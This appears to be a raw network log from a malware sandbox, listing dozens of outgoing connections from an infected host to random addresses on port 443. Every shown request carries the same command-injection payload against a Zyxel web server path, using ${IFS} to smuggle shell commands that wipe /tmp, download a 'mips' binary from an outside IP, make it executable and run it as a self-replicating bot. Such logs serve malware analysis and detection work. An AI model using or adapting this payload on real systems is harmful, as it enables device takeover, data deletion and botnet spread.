                                        Mar 31, 2024 09:21:05.690109015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3738192.168.2.2336504160.53.12.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:06.721668959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3739192.168.2.234311490.81.219.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:06.721729040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3740192.168.2.234638252.252.158.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:06.721942902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3741192.168.2.2341202164.218.66.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:06.722029924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3742192.168.2.234731844.235.141.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:07.727161884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3743192.168.2.23584564.107.103.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:07.727350950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3744192.168.2.2343350168.229.65.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:07.727413893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3745192.168.2.2356364156.99.189.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:07.727473974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3746192.168.2.2349960174.253.146.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.745644093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3747192.168.2.2335236186.58.2.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.745699883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3748192.168.2.235992024.215.114.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.745765924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3749192.168.2.234348885.73.234.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.745820045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3750192.168.2.235738645.89.217.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.745917082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3751192.168.2.2360286134.110.86.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.745970964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3752192.168.2.235752445.103.88.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746043921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3753192.168.2.234092839.6.224.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746112108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3754192.168.2.2336296106.125.54.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746196032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3755192.168.2.2344046181.249.153.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746287107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3756192.168.2.234555848.104.128.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746341944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3757192.168.2.235987246.119.211.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746417046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3758192.168.2.235589038.129.136.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746474981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3759192.168.2.2350722140.154.226.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746560097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3760192.168.2.2355558168.6.115.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746622086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3761192.168.2.2333916220.220.85.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746689081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3762192.168.2.234118420.204.156.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746768951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3763192.168.2.234043053.64.151.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746845007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3764192.168.2.2345542145.184.0.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746912003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3765192.168.2.235724677.19.247.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.746967077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3766192.168.2.234925893.163.220.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747040033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3767192.168.2.234386434.16.51.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747107029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3768192.168.2.2340950174.151.31.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747145891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3769192.168.2.2342270158.163.43.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747234106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3770192.168.2.235735025.50.150.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747286081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3771192.168.2.2337536195.187.16.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747381926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3772192.168.2.2341116129.82.66.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747440100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3773192.168.2.235082231.90.210.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747500896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3774192.168.2.2336552203.235.108.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747560024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3775192.168.2.2359330112.233.84.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747620106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3776192.168.2.2358770106.221.19.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747684956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3777192.168.2.2338110172.0.239.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747756958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3778192.168.2.2344202195.107.125.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747828960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3779192.168.2.2357774169.159.199.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747914076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3780192.168.2.2335752155.248.53.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.747968912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3781192.168.2.234443274.241.149.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748056889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3782192.168.2.233828072.123.123.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748114109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3783192.168.2.2351950220.219.170.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748192072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3784192.168.2.2342350205.41.194.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748256922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3785192.168.2.2357938177.3.204.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748321056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3786192.168.2.23459724.134.212.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748402119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3787192.168.2.2345354171.229.162.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748477936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3788192.168.2.2358404126.134.241.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748542070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3789192.168.2.2344452201.179.77.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748599052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3790192.168.2.2354632197.129.242.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748662949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3791192.168.2.233879224.251.16.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748743057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3792192.168.2.234806052.23.204.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748804092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3793192.168.2.2356042174.185.230.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748874903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3794192.168.2.233733039.107.90.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.748966932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3795192.168.2.2338612194.102.53.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749016047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3796192.168.2.2356664163.166.203.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749092102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3797192.168.2.2342830125.158.1.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749175072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3798192.168.2.2343152163.201.79.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749231100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3799192.168.2.2340372103.80.145.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749293089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3800192.168.2.2355342149.106.154.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749356031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3801192.168.2.2349918108.24.74.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749419928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3802192.168.2.2350706157.101.17.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749485016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3803192.168.2.2359658162.184.211.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749558926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3804192.168.2.2348380207.218.100.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749638081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3805192.168.2.2349524174.82.225.193443
                                        TimestampBytes transferredDirectionData
